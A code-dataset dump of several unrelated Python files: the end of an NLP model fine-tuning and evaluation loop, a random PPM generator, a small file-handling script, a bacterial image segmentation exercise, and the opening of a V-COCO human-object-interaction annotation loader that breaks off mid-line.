None, None, None\n args_load_batcher_shard_data = None\n printing(\"INFO : starting loading readers\", verbose=verbose, verbose_level=1)\n readers_train = readers_load(datasets=args.train_path,\n tasks=args.tasks,\n word_dictionary=word_dictionary,\n bert_tokenizer=tokenizer,\n word_dictionary_norm=word_norm_dictionary, char_dictionary=char_dictionary,\n pos_dictionary=pos_dictionary, xpos_dictionary=xpos_dictionary,\n type_dictionary=type_dictionary,\n word_decoder=True,\n run_mode=run_mode,\n add_start_char=1, add_end_char=1, symbolic_end=1,\n symbolic_root=1, bucket=True,\n must_get_norm=True, input_level_ls=input_level_ls,\n verbose=verbose)\n n_sent_dataset_total_train = readers_train[list(readers_train.keys())[0]][3]\n printing(\"INFO : done with sharding\", verbose=verbose, verbose_level=1)\n else:\n printing(\"INFO : building/loading shards \", verbose=verbose, verbose_level=1)\n data_sharded, n_shards, n_sent_dataset_total_train = build_shard(data_sharded, args.train_path, n_sent_max_per_file=N_SENT_MAX_CONLL_PER_SHARD, verbose=verbose)\n\n time_load_readers_dev_start = time.time()\n time_load_readers_train = time.time()-time_load_readers_train_start\n readers_dev_ls = []\n dev_data_label_ls = []\n printing(\"INFO : g readers for dev\", verbose=verbose, verbose_level=1)\n printout_allocated_gpu_memory(verbose, \"{} reader train loaded\".format(model_id))\n for dev_path in args.dev_path:\n dev_data_label = get_dataset_label(dev_path, default=\"dev\")\n dev_data_label_ls.append(dev_data_label)\n readers_dev = readers_load(datasets=dev_path, tasks=args.tasks, word_dictionary=word_dictionary,\n word_dictionary_norm=word_norm_dictionary, char_dictionary=char_dictionary,\n pos_dictionary=pos_dictionary, xpos_dictionary=xpos_dictionary,\n bert_tokenizer=tokenizer,\n type_dictionary=type_dictionary,\n word_decoder=True, run_mode=run_mode,\n add_start_char=1, add_end_char=1,\n symbolic_end=1, symbolic_root=1, bucket=False,\n must_get_norm=True,input_level_ls=input_level_ls,\n verbose=verbose) if args.dev_path is not None else None\n readers_dev_ls.append(readers_dev)\n printout_allocated_gpu_memory(verbose, \"{} reader dev loaded\".format(model_id))\n\n time_load_readers_dev = time.time()-time_load_readers_dev_start\n # Load tokenizer\n printing(\"TIME : {} \", var=[OrderedDict([(\"time_load_readers_train\", \"{:0.4f} min\".format(time_load_readers_train/60)), (\"time_load_readers_dev\", \"{:0.4f} min\".format(time_load_readers_dev/60))])],\n verbose=verbose, verbose_level=2)\n\n early_stoping_val_former = 1000\n # training starts when epoch is 1\n #args.epochs += 1\n #assert args.epochs >= 1, \"ERROR need at least 2 epochs (1 eval , 1 train 1 eval\"\n flexible_batch_size = False\n \n if args.optimizer == \"AdamW\":\n model, optimizer, scheduler = apply_fine_tuning_strategy(model=model,\n fine_tuning_strategy=args.fine_tuning_strategy,\n lr_init=args.lr, betas=(0.9, 0.99),epoch=0,\n weight_decay=args.weight_decay,\n optimizer_name=args.optimizer,\n t_total=n_sent_dataset_total_train / args.batch_update_train * args.epochs if n_sent_dataset_total_train / args.batch_update_train * args.epochs > 1 else 5,\n verbose=verbose)\n\n try:\n for epoch in range(args.epochs):\n if args.memory_efficient_iterator:\n # we start epoch with a new shart everytime !\n training_file = get_new_shard(data_sharded, n_shards)\n printing(\"INFO Memory efficient iterator triggered (only build for train data , starting with {}\",\n var=[training_file], verbose=verbose, verbose_level=1)\n args_load_batcher_shard_data = {\"word_dictionary\": word_dictionary, \"tokenizer\": tokenizer,\n \"word_norm_dictionary\": word_norm_dictionary,\n \"char_dictionary\": char_dictionary,\n \"pos_dictionary\": pos_dictionary,\n \"xpos_dictionary\": xpos_dictionary,\n \"type_dictionary\": type_dictionary, \"use_gpu\": use_gpu,\n \"norm_not_norm\": auxilliary_task_norm_not_norm,\n \"word_decoder\": True,\n \"add_start_char\": 1, \"add_end_char\": 1, \"symbolic_end\": 1,\n \"symbolic_root\": 1,\n \"bucket\": True, \"max_char_len\": 20, \"must_get_norm\": True,\n \"use_gpu_hardcoded_readers\": False,\n \"bucketing_level\": \"bpe\", \"input_level_ls\": [\"wordpiece\"],\n \"auxilliary_task_norm_not_norm\": auxilliary_task_norm_not_norm,\n \"random_iterator_train\": random_iterator_train\n }\n\n readers_train = readers_load(datasets=args.train_path if not args.memory_efficient_iterator else training_file,\n tasks=args.tasks, word_dictionary=word_dictionary,\n bert_tokenizer=tokenizer, word_dictionary_norm=word_norm_dictionary, char_dictionary=char_dictionary,\n pos_dictionary=pos_dictionary, xpos_dictionary=xpos_dictionary,\n type_dictionary=type_dictionary,\n word_decoder=True, run_mode=run_mode,\n add_start_char=1, add_end_char=1, symbolic_end=1,\n symbolic_root=1, bucket=True,\n must_get_norm=True, input_level_ls=input_level_ls, verbose=verbose)\n\n checkpointing_model_data = (epoch % saving_every_epoch == 0 or epoch == (args.epochs - 1))\n # build iterator on the loaded data\n printout_allocated_gpu_memory(verbose, \"{} loading batcher\".format(model_id))\n\n\n if args.batch_size == \"flexible\":\n flexible_batch_size = True\n\n printing(\"INFO : args.batch_size {} so updating it based on mean value {}\",\n var=[args.batch_size, update_batch_size_mean(readers_train)],\n verbose=verbose, verbose_level=1)\n args.batch_size = update_batch_size_mean(readers_train)\n\n if args.batch_update_train == \"flexible\":\n args.batch_update_train = args.batch_size\n printing(\"TRAINING : backward pass every {} step of size {} in average\",\n var=[int(args.batch_update_train // args.batch_size), args.batch_size],\n verbose=verbose, verbose_level=1)\n try:\n assert isinstance(args.batch_update_train // args.batch_size, int)\\\n and args.batch_update_train // args.batch_size > 0, \\\n \"ERROR batch_size {} should be a multiple of {} \".format(args.batch_update_train, args.batch_size)\n except Exception as e:\n print(\"WARNING {}\".format(e))\n batchIter_train = data_gen_multi_task_sampling_batch(tasks=args.tasks,\n readers=readers_train,\n batch_size=readers_train[list(readers_train.keys())[0]][4],\n max_token_per_batch=max_token_per_batch if flexible_batch_size else None,\n word_dictionary=word_dictionary,\n char_dictionary=char_dictionary,\n pos_dictionary=pos_dictionary,\n word_dictionary_norm=word_norm_dictionary,\n get_batch_mode=random_iterator_train,\n print_raw=False,\n dropout_input=0.0,\n verbose=verbose)\n\n # -|-|-\n printout_allocated_gpu_memory(verbose, \"{} batcher train loaded\".format(model_id))\n batchIter_dev_ls = []\n batch_size_DEV = 1\n\n if verbose > 1:\n print(\"WARNING : batch_size for final eval was hardcoded and set to {}\".format(batch_size_DEV))\n for readers_dev in readers_dev_ls:\n batchIter_dev = data_gen_multi_task_sampling_batch(tasks=args.tasks, readers=readers_dev,\n batch_size=batch_size_DEV,\n word_dictionary=word_dictionary,\n char_dictionary=char_dictionary,\n pos_dictionary=pos_dictionary,\n word_dictionary_norm=word_norm_dictionary,\n get_batch_mode=False,\n print_raw=False,\n\n dropout_input=0.0,\n verbose=verbose) if args.dev_path is not None else None\n batchIter_dev_ls.append(batchIter_dev)\n\n\n model.train()\n printout_allocated_gpu_memory(verbose, \"{} batcher dev loaded\".format(model_id))\n if args.optimizer != \"AdamW\":\n\n model, optimizer, scheduler = apply_fine_tuning_strategy(model=model,\n fine_tuning_strategy=args.fine_tuning_strategy,\n lr_init=args.lr, betas=(0.9, 0.99),\n weight_decay=args.weight_decay,\n optimizer_name=args.optimizer,\n t_total=n_sent_dataset_total_train / args.batch_update_train * args.epochs if n_sent_dataset_total_train / args.batch_update_train*args.epochs > 1 else 5,\n epoch=epoch, verbose=verbose)\n printout_allocated_gpu_memory(verbose, \"{} optimizer loaded\".format(model_id))\n loss_train = None\n\n if epoch >= 0:\n printing(\"TRAINING : training on GET_BATCH_MODE \", verbose=verbose, verbose_level=2)\n printing(\"TRAINING {} training 1 'epoch' = {} observation size args.batch_\"\n \"update_train (foward {} batch_size {} backward \"\n \"(every int(args.batch_update_train//args.batch_size) step if {})) \",\n var=[model_id, n_observation_max_per_epoch_train, args.batch_size, args.batch_update_train,\n args.low_memory_foot_print_batch_mode],\n verbose=verbose, verbose_level=1)\n loss_train, iter_train, perf_report_train, _ = epoch_run(batchIter_train, tokenizer,\n args=args,\n model_origin=model_origin,\n pruning_mask=pruning_mask,\n task_to_label_dictionary=task_to_label_dictionary,\n data_label=train_data_label,\n model=model,\n dropout_input_bpe=args.dropout_input_bpe,\n writer=writer,\n iter=iter_train, epoch=epoch,\n writing_pred=epoch == (args.epochs - 1),\n dir_end_pred=end_predictions,\n optimizer=optimizer, use_gpu=use_gpu,\n scheduler=scheduler,\n predict_mode=(epoch-1)%5 == 0,\n skip_1_t_n=skip_1_t_n,\n model_id=model_id,\n reference_word_dic={\"InV\": inv_word_dic},\n null_token_index=null_token_index, null_str=null_str,\n norm_2_noise_eval=False,\n early_stoppin_metric=None,\n n_obs_max=n_observation_max_per_epoch_train,\n data_sharded_dir=data_sharded,\n n_shards=n_shards,\n n_sent_dataset_total=n_sent_dataset_total_train,\n args_load_batcher_shard_data=args_load_batcher_shard_data,\n memory_efficient_iterator=args.memory_efficient_iterator,\n verbose=verbose)\n\n else:\n printing(\"TRAINING : skipping first epoch to start by evaluating on devs dataset0\", verbose=verbose, verbose_level=1)\n printout_allocated_gpu_memory(verbose, \"{} epoch train done\".format(model_id))\n model.eval()\n\n if args.dev_path is not None and (epoch%3==0 or epoch<=6):\n if verbose > 1:\n print(\"RUNNING DEV on ITERATION MODE\")\n early_stoping_val_ls = []\n loss_dev_ls = []\n for i_dev, batchIter_dev in enumerate(batchIter_dev_ls):\n loss_dev, iter_dev, perf_report_dev, early_stoping_val = epoch_run(batchIter_dev, tokenizer,\n args=args,\n epoch=epoch,\n model_origin=model_origin,\n pruning_mask=pruning_mask,\n task_to_label_dictionary=task_to_label_dictionary,\n iter=iter_dev, use_gpu=use_gpu,\n model=model,\n writer=writer,\n optimizer=None,\n writing_pred=True,#epoch == (args.epochs - 1),\n dir_end_pred=end_predictions,\n predict_mode=True,\n data_label=dev_data_label_ls[i_dev],\n null_token_index=null_token_index,\n null_str=null_str,\n model_id=model_id,\n skip_1_t_n=skip_1_t_n,\n dropout_input_bpe=0,\n reference_word_dic={\"InV\": inv_word_dic},\n norm_2_noise_eval=False,\n early_stoppin_metric=early_stoppin_metric,\n subsample_early_stoping_metric_val=subsample_early_stoping_metric_val,\n #case=case,\n n_obs_max=n_observation_max_per_epoch_dev_test,\n verbose=verbose)\n\n printing(\"TRAINING : loss train:{} dev {}:{} for epoch {} out of {}\",\n var=[loss_train, i_dev, loss_dev, epoch, args.epochs], verbose=1, verbose_level=1)\n printing(\"PERFORMANCE {} DEV {} {} \", var=[epoch, i_dev+1, perf_report_dev], verbose=verbose,\n verbose_level=1)\n early_stoping_val_ls.append(early_stoping_val)\n loss_dev_ls.append(loss_dev)\n\n else:\n if verbose > 1:\n print(\"NO DEV EVAL\")\n loss_dev, iter_dev, perf_report_dev = None, 0, None\n # NB : early_stoping_val is based on first dev set\n printout_allocated_gpu_memory(verbose, \"{} epoch dev done\".format(model_id))\n\n early_stoping_val = early_stoping_val_ls[0]\n if checkpointing_model_data or early_stoping_val < early_stoping_val_former:\n if early_stoping_val is not None:\n _epoch = \"best\" if early_stoping_val < early_stoping_val_former else epoch\n else:\n if verbose > 1:\n print('WARNING early_stoping_val is None so saving based on checkpointing_model_data only')\n _epoch = epoch\n # model_id enriched possibly with some epoch informaiton if name_with_epoch\n _model_id = get_name_model_id_with_extra_name(epoch=epoch, _epoch=_epoch,\n name_with_epoch=name_with_epoch, model_id=model_id)\n checkpoint_dir = os.path.join(model_location, \"{}-checkpoint.pt\".format(_model_id))\n\n if _epoch == \"best\":\n printing(\"CHECKPOINT : SAVING BEST MODEL {} (epoch:{}) (new loss is {} former was {})\".format(checkpoint_dir, epoch, early_stoping_val, early_stoping_val_former), verbose=verbose, verbose_level=1)\n last_checkpoint_dir_best = checkpoint_dir\n early_stoping_val_former = early_stoping_val\n best_epoch = epoch\n best_loss = early_stoping_val\n else:\n printing(\"CHECKPOINT : NOT SAVING BEST MODEL : new loss {} did not beat first loss {}\".format(early_stoping_val , early_stoping_val_former), verbose_level=1, verbose=verbose)\n last_model = \"\"\n if epoch == (args.epochs - 1):\n last_model = \"last\"\n printing(\"CHECKPOINT : epoch {} saving {} model {} \", var=[epoch,last_model, checkpoint_dir], verbose=verbose,verbose_level=1)\n torch.save(model.state_dict(), checkpoint_dir)\n\n args_dir = write_args(dir=model_location, checkpoint_dir=checkpoint_dir,\n hyperparameters=hyperparameters if name_with_epoch else None,\n model_id=_model_id,\n info_checkpoint=OrderedDict([(\"epochs\", epoch+1),\n (\"batch_size\", args.batch_size if not args.low_memory_foot_print_batch_mode else args.batch_update_train),\n (\"train_path\", train_data_label), (\"dev_path\", dev_data_label_ls), (\"num_labels_per_task\", num_labels_per_task)]),\n verbose=verbose)\n\n if row is not None and update_status is not None:\n update_status(row=row, value=\"training-done\", verbose=1)\n except Exception as e:\n if row is not None and update_status is not None:\n update_status(row=row, value=\"ERROR\", verbose=1)\n raise(e)\n\n # reloading last (best) checkpoint\n if run_mode in [\"train\", \"test\"] and args.test_paths is not None:\n report_all = []\n if run_mode == \"train\" and args.epochs>0:\n if use_gpu:\n model.load_state_dict(torch.load(last_checkpoint_dir_best))\n model = model.cuda()\n printout_allocated_gpu_memory(verbose, \"{} after reloading model\".format(model_id))\n else:\n model.load_state_dict(torch.load(last_checkpoint_dir_best, map_location=lambda storage, loc: storage))\n printing(\"MODEL : RELOADING best model of epoch {} with loss {} based on {}({}) metric (from checkpoint {})\", var=[best_epoch, best_loss, early_stoppin_metric, subsample_early_stoping_metric_val, last_checkpoint_dir_best], verbose=verbose, verbose_level=1)\n\n model.eval()\n\n printout_allocated_gpu_memory(verbose, \"{} starting test\".format(model_id))\n for test_path in args.test_paths:\n assert len(test_path) == len(args.tasks), \"ERROR test_path {} args.tasks {}\".format(test_path, args.tasks)\n for test, task_to_eval in zip(test_path, args.tasks):\n label_data = get_dataset_label([test], default=\"test\")\n if len(extra_label_for_prediction) > 0:\n label_data += \"-\" + extra_label_for_prediction\n\n if args.shuffle_bpe_embedding and args.test_mode_no_shuffle_embedding:\n printing(\"TOKENIZER: as args.shuffle_bpe_embedding {} and test_mode_no_shuffle {} : reloading tokenizer with no shuffle_embedding\",\n var=[args.shuffle_bpe_embedding, args.test_mode_no_shuffle_embedding], verbose=1, verbose_level=1)\n tokenizer = tokenizer.from_pretrained(voc_tokenizer, do_lower_case=args.case == \"lower\", shuffle_bpe_embedding=False)\n readers_test = readers_load(datasets=[test],\n tasks=[task_to_eval],\n word_dictionary=word_dictionary,\n word_dictionary_norm=word_norm_dictionary,\n char_dictionary=char_dictionary,\n pos_dictionary=pos_dictionary,\n xpos_dictionary=xpos_dictionary,\n type_dictionary=type_dictionary,\n bert_tokenizer=tokenizer,\n word_decoder=True,\n run_mode=run_mode,\n add_start_char=1, add_end_char=1, symbolic_end=1,\n symbolic_root=1, bucket=bucket_test,\n input_level_ls=input_level_ls,\n must_get_norm=must_get_norm_test,\n verbose=verbose)\n\n heuritics_zip = [None]\n gold_error_or_not_zip = [False]\n norm2noise_zip = [False]\n\n if heuristic_test_ls is None:\n assert len(gold_error_or_not_zip) == len(heuritics_zip) and len(heuritics_zip) == len(norm2noise_zip)\n\n batch_size_TEST = 1\n if verbose>1:\n print(\"WARNING : batch_size for final eval was hardcoded and set to {}\".format(batch_size_TEST))\n for (heuristic_test, gold_error, norm_2_noise_eval) in zip(heuritics_zip, gold_error_or_not_zip, norm2noise_zip):\n\n assert heuristic_test is None and not gold_error and not norm_2_noise_eval\n\n batchIter_test = data_gen_multi_task_sampling_batch(tasks=[task_to_eval], readers=readers_test,\n batch_size=batch_size_TEST,\n word_dictionary=word_dictionary,\n char_dictionary=char_dictionary,\n pos_dictionary=pos_dictionary,\n word_dictionary_norm=word_norm_dictionary,\n get_batch_mode=False,\n dropout_input=0.0,\n verbose=verbose)\n try:\n loss_test, iter_test, perf_report_test, _ = epoch_run(batchIter_test, tokenizer,\n args=args,\n iter=iter_dev, use_gpu=use_gpu,\n model=model,\n task_to_label_dictionary=task_to_label_dictionary,\n writer=None,\n writing_pred=True,\n optimizer=None,\n args_dir=args_dir, model_id=model_id,\n dir_end_pred=end_predictions,\n skip_1_t_n=skip_1_t_n,\n predict_mode=True, data_label=label_data,\n epoch=\"LAST\", extra_label_for_prediction=label_data,\n null_token_index=null_token_index,\n null_str=null_str,\n log_perf=False,\n dropout_input_bpe=0,\n norm_2_noise_eval=norm_2_noise_eval,\n compute_intersection_score=compute_intersection_score_test,\n remove_mask_str_prediction=remove_mask_str_prediction,\n reference_word_dic={\"InV\": inv_word_dic},\n threshold_edit=threshold_edit,\n verbose=verbose,\n n_obs_max=n_observation_max_per_epoch_dev_test)\n if verbose>1:\n print(\"LOSS TEST\", loss_test)\n except Exception as e:\n print(\"ERROR (epoch_run test) {} test_path {} , heuristic {} , gold error {} , norm2noise {} \".format(e, test, heuristic_test, gold_error, norm_2_noise_eval))\n raise(e)\n print(\"PERFORMANCE TEST on data {} is {} \".format(label_data, perf_report_test))\n print(\"DATA WRITTEN {}\".format(end_predictions))\n if writer is not None:\n writer.add_text(\"Accuracy-{}-{}-{}\".format(model_id, label_data, run_mode),\n \"After {} epochs with {} : performance is \\n {} \".format(args.epochs, description,\n str(perf_report_test)), 0)\n else:\n printing(\"WARNING : could not add accuracy to tensorboard cause writer was found None\", verbose=verbose,\n verbose_level=2)\n report_all.extend(perf_report_test)\n printout_allocated_gpu_memory(verbose, \"{} test done\".format(model_id))\n else:\n printing(\"ERROR : EVALUATION none cause {} empty or run_mode {} \",\n var=[args.test_paths, run_mode], verbose_level=1, verbose=verbose)\n\n if writer is not None:\n writer.close()\n printing(\"tensorboard --logdir={} --host=localhost --port=1234 \", var=[tensorboard_log], verbose_level=1,verbose=verbose)\n\n report_dir = os.path.join(model_location, model_id+\"-report.json\")\n if report_full_path_shared is not None:\n report_full_dir = os.path.join(report_full_path_shared, args.overall_label + \"-report.json\")\n if os.path.isfile(report_full_dir):\n report = json.load(open(report_full_dir, \"r\"))\n else:\n report = []\n printing(\"REPORT = creating overall report at {} \", var=[report_dir], verbose=verbose, verbose_level=1)\n report.extend(report_all)\n json.dump(report, open(report_full_dir, \"w\"))\n printing(\"{} {} \", var=[REPORT_FLAG_DIR_STR, report_full_dir], verbose=0, verbose_level=0)\n\n json.dump(report_all, open(report_dir, \"w\"))\n printing(\"REPORTING TO {}\".format(report_dir), verbose=verbose, verbose_level=1)\n if report_full_path_shared is None:\n printing(\"WARNING ; report_full_path_shared is None\", verbose=verbose, verbose_level=1)\n printing(\"{} {} \", var=[REPORT_FLAG_DIR_STR, report_dir], verbose=verbose, verbose_level=0)\n\n return model\n","sub_path":"transfer/downstream/finetune/trainer/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":47421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"550516322","text":"import argparse\nimport numpy as np\nimport time\nfrom pathlib import Path\n\n\ndef randomPPMcreator(seq_length): \n sequence_ppm_arrays = [np.random.dirichlet(\n np.ones(4), size=1) for i in range(0, seq_length)]\n sequenceppm = [(ppm[0].tolist()) for ppm in sequence_ppm_arrays]\n return sequenceppm\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--number', '-n', type=int,\n help='Number of random PPMs user wants to create', default=1)\nparser.add_argument('--seq_length', '-sl', default=7, type=int,\n help='Number that specifies how long will be the random training sequence')\nparser.add_argument('--outfile', '-out', type=str, default='.',\n help='Specify absolute or relative path to output directory, default = .') \nargs = parser.parse_args()\n\n\n# preparing files and folders\nts = time.time()\n\np = Path(args.outfile)\n\noutput_folder = Path(f'{p}', 'results', 'preprocessed_pwms', 'random', f'{ts}')\noutput_folder.mkdir(parents=True, exist_ok=True)\n\n# creating dict with random PPMs\nseq_length = args.seq_length\n\nrandom_ppms = {}\nfor i in range(args.number):\n header = f'random_{i+1}_length_{seq_length}'\n ppm = randomPPMcreator(seq_length)\n random_ppms[header] = np.asarray(ppm)\n\n# processing output files\nfor header, ppm in random_ppms.items():\n output_file = f'{header}'\n output_file_path = output_folder / output_file\n np.save(output_file_path, ppm)","sub_path":"tools/pwm_prepr/create_random_PPM.py","file_name":"create_random_PPM.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"103262866","text":"# coding=UTF-8\r\nimport zipfile,os\r\n\r\n\r\npath = r'C:\\Users\\admin\\Desktop\\19套BSC最新License文件20180831'\r\n##list = os.listdir(path) #列出文件夹下所有的目录与文件\r\n##for i in range(0,len(list)):\r\n## fpath = os.path.join(path,list[i])\r\n## if os.path.splitext(fpath)[1].lower() =='.dat':\r\n## with open(fpath, 'r', encoding='utf-8') as f:\r\n## cont = f.read()\r\n## for esn in dic:\r\n## if cont.find(esn) != -1:\r\n## f.close()\r\n## lpath = path+'\\cbsclicense.dat'\r\n## os.mkdir(path + '\\\\'+ dic[esn])\r\n## os.rename(fpath,lpath)\r\n## shutil.move(lpath, path + '\\\\'+ dic[esn] + '\\cbsclicense.dat')\r\n## city = dic[esn][0:3] + 'License.zip'\r\n## break\r\n\r\ncity = '深圳License.zip'\r\nzipfilepath = os.path.join(path,city)\r\nmypath = path.split('\\\\')[-1]\r\nprint(mypath)\r\n","sub_path":"t.py","file_name":"t.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"144550214","text":"#Lesson 40 Practice 1-Writing your own segementation function\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set_style('dark')\n\nimport skimage.io\nimport skimage.filters\nimport skimage.measure\nimport skimage.segmentation\nfrom skimage import morphology\n\n#Load the image\n\n#file 1\n#im_phase = skimage.io.imread('data/bsub_100x_phase.tif')\n\n#file2\nim_phase = skimage.io.imread('data/bsub_100x_phase.tif')\n\n\n\n#histogram to figure out threshold\n#\n# hist_images, bins_images = skimage.exposure.histogram(im_phase)\n# plt.plot(bins_images,hist_images)\n# plt.xlabel('pixel value')\n# plt.ylabel('count')\n# plt.show()\n\ndef img_segmentation(im_phase, thresh):\n \"\"\"function to segment any phase contrast image of bacteria\"\"\"\n\n #display the original image\n plt.imshow(im_phase)\n plt.title ('Original Image')\n plt.show()\n\n #filter out noise using median filters\n # Make the structuring element\n selem = skimage.morphology.square(3)\n # Perform the median filter\n im_phase_med = skimage.filters.median(im_phase, selem)\n\n # Show filtered image with the viridis LUT.\n plt.imshow(im_phase_med, cmap=plt.cm.Greys_r)\n plt.colorbar()\n plt.title ('Median Filtered Image')\n plt.show()\n\n\n #apply a gaussian blur with a 50 pixel radius\n im_phase_gauss = skimage.filters.gaussian(im_phase, 50.0)\n\n #subtract the background\n # Convert the median-filtered phase image to a float64\n im_phase_float = skimage.img_as_float(im_phase_med)\n\n # Subtract our gaussian blurred image from the original.\n im_phase_sub = im_phase_float - im_phase_gauss\n\n #show images side by side (filtered median vs pic with\n #subtracted background)\n fig, ax = plt.subplots(1, 2, figsize=(9.5, 8))\n ax[0].imshow(im_phase_float, cmap=plt.cm.viridis)\n ax[1].imshow(im_phase_sub, cmap=plt.cm.viridis)\n plt.title ('Image With Uniform Background')\n plt.show()\n\n #generate threshold image\n im_phase_thresh = im_phase_med < thresh\n\n #show the result\n plt.imshow(im_phase_thresh)\n plt.title ('Threshold Image')\n plt.show()\n\n #removing objects that are too small\n im_phase_nosmall = morphology.remove_small_objects(im_phase_thresh, min_size=450)\n #min size was only 100 or 200 for the ecoli files, depends on the file type\n plt.imshow(im_phase_nosmall, cmap=plt.cm.Greys_r)\n plt.title ('Image Without Small Objects')\n plt.show()\n\n #removing objects on/close to the border\n im_phase_noborder=skimage.segmentation.clear_border(im_phase_nosmall,\n buffer_size=0.2)\n\n #show the result\n plt.imshow(im_phase_noborder, cmap=plt.cm.Greys_r)\n plt.title ('Final Image')\n plt.show()\n\nimg_segmentation(im_phase, 300)\n","sub_path":"imageprocessingfunction.py","file_name":"imageprocessingfunction.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"602319563","text":"\nimport contextlib\nimport datetime\nimport io\nimport json\nimport logging\nimport numpy as np\nimport os\nimport pycocotools.mask as mask_util\nfrom fvcore.common.file_io import PathManager, file_lock\nfrom fvcore.common.timer import Timer\nfrom PIL import Image\n\nfrom detectron2.structures import Boxes, BoxMode, PolygonMasks\nfrom detectron2.data.catalog import DatasetCatalog, MetadataCatalog\n\n\"\"\"\nThis file contains functions to parse HOI annotations into dicts in \"Detectron2 format\".\n\"\"\"\n\n\nlogger = logging.getLogger(__name__)\n\n__all__ = [\"load_vcoco_json\"]\n\n\ndef load_vcoco_json(json_file, image_root, dataset_name=None, extra_annotation_keys=None):\n \"\"\"\n Load a json file with HOI's instances annotation format.\n\n Args:\n json_file (str): full path to the json file in HOI instances annotation format.\n image_root (str or path-like): the directory where the images in this json file exists.\n dataset_name (str): the name of the dataset (e.g., `vcoco_train`).\n If provided, this function will also put \"thing_classes\" into\n the metadata associated with this dataset.\n extra_annotation_keys (list[str]): list of per-annotation keys that should also be\n loaded into the dataset dict (besides \"iscrowd\", \"bbox\", \"keypoints\",\n \"category_id\", \"segmentation\"). The values for these keys will be returned as-is.\n For example, the densepose annotations are loaded in this way.\n\n Returns:\n list[dict]: a list of dicts in Detectron2 standard dataset dicts format. (See\n `Using Custom Datasets `_ )\n\n Notes:\n 1. This function does not read the image files.\n The results do not have the \"image\" field.\n \"\"\"\n from pycocotools.coco import COCO\n\n timer = Timer()\n json_file = PathManager.get_local_path(json_file)\n with contextlib.redirect_stdout(io.StringIO()):\n coco_api = COCO(json_file)\n if timer.seconds() > 1:\n logger.info(\"Loading {} takes {:.2f} seconds.\".format(json_file, timer.seconds()))\n\n id_map = None\n action_map = None\n if dataset_name is not None:\n meta = MetadataCatalog.get(dataset_name)\n cat_ids = sorted(coco_api.getCatIds())\n cats = coco_api.loadCats(cat_ids)\n # The categories in a custom json file may not be sorted.\n thing_classes = [c[\"name\"] for c in sorted(cats, key=lambda x: x[\"id\"])]\n meta.thing_classes = thing_classes\n\n # In COCO, certain category ids are artificially removed,\n # and by convention they are always ignored.\n # We deal with COCO's id issue and translate\n # the category ids to contiguous ids in [0, 80).\n\n # It works by looking at the \"categories\" field in the json, therefore\n # if users' own json also have incontiguous ids, we'll\n # apply this mapping as well but print a warning.\n if not (min(cat_ids) == 1 and max(cat_ids) == len(cat_ids)):\n if \"coco\" not in dataset_name:\n logger.warning(\n \"\"\"\nCategory ids in annotations are not in [1, #categories]! We'll apply a mapping for you.\n\"\"\"\n )\n id_map = {v: i for i, v in enumerate(cat_ids)}\n meta.thing_dataset_id_to_contiguous_id = id_map\n\n person_cls_id = meta.person_cls_id\n action_classes = meta.action_classes\n\n # sort indices for reproducible results\n img_ids = sorted(coco_api.imgs.keys())\n # imgs is a list of dicts, each looks something like:\n # {'license': 4,\n # 'url': 'http://farm6.staticflickr.com/5454/9413846304_881d5e5c3b_z.jpg',\n # 'file_name': 'COCO_val2014_000000001268.jpg',\n # 'height': 427,\n # 'width': 640,\n # 'date_captured': '2013-11-17 05:57:24',\n # 'id': 1268}\n imgs = coco_api.loadImgs(img_ids)\n # anns is a list[list[dict]], where each dict is an annotation\n # record for an object. The inner list enumerates the objects in an image\n # and the outer list enumerates over images. Example of anns[0]:\n # [{'segmentation': [[192.81,\n # 247.09,\n # ...\n # 219.03,\n # 249.06]],\n # 'area': 1035.749,\n # 'iscrowd': 0,\n # 'image_id': 1268,\n # 'bbox': [192.81, 224.8, 74.73, 33.43],\n # 'category_id': 16,\n # 'id': 42986,\n # 'hoi_isactive': 1,\n # 'hoi_triplets': [{person_id: 42984, object_id: 42986, action_id: 4}, ...],\n # },\n # ...]\n anns = [coco_api.imgToAnns[img_id] for img_id in img_ids]\n\n imgs_anns = list(zip(imgs, anns))\n\n logger.info(\"Loaded {} images in HOI format from {}\".format(len(imgs_anns), json_file))\n\n dataset_dicts = []\n\n ann_keys = [\"iscrowd\", \"bbox\", \"category_id\"]\n \n ann_keys += (extra_annotation_keys or [])\n\n num_instances_without_hoi_annotations = 0\n\n for (img_dict, anno_dict_list) in imgs_anns:\n record = {}\n record[\"file_name\"] = os.path.join(image_root, img_dict[\"file_name\"])\n record[\"height\"] = img_dict[\"height\"]\n record[\"width\"] = img_dict[\"width\"]\n image_id = record[\"image_id\"] = img_dict[\"id\"]\n\n objs = []\n num_instances = len(anno_dict_list)\n for anno in anno_dict_list:\n # Check that the image_id in this annotation is the same as\n # the image_id we're looking at.\n # This fails only when the data parsing logic or the annotation file is buggy.\n\n # The original COCO valminusminival2014 & minival2014 annotation files\n # actually contains bugs that, together with certain ways of using COCO API,\n # can trigger this assertion.\n assert anno[\"image_id\"] == image_id\n\n obj = {key: anno[key] for key in ann_keys if key in anno}\n\n # \"hoi_triplets\" in the annotation is a list[dict], where each dict is an\n # annotation record for an interaction. Example of anno[\"hoi_triplet\"][0]:\n # [{\n # person_id: 42984,\n # object_id: 42986,\n # action_id: 4\n # },\n # ... ]\n # Here \"person_id\" (\"object_id\") is the *anno id* of the person (object) instance.\n # For each instance, we record its interactions with other instances in the given\n # image in an binary matrix named `actions` with shape (N, K), where N is the number\n # of instances and K is the number of actions. If this instance is interacting with\n # j-th instance with k-th action, then (i, j) entry of `actions` will be 1.\n actions = np.zeros((num_instances, len(action_classes)))\n hoi_triplets = anno[\"hoi_triplets\"]\n if len(hoi_triplets) > 0:\n # Mapping *anno id* of instances to contiguous indices in this image\n map_to_contiguous_id_within_image(hoi_triplets, anno_dict_list)\n for triplet in hoi_triplets:\n action_id = triplet[\"action_id\"]\n is_person = (anno[\"category_id\"] == person_cls_id)\n target_id = 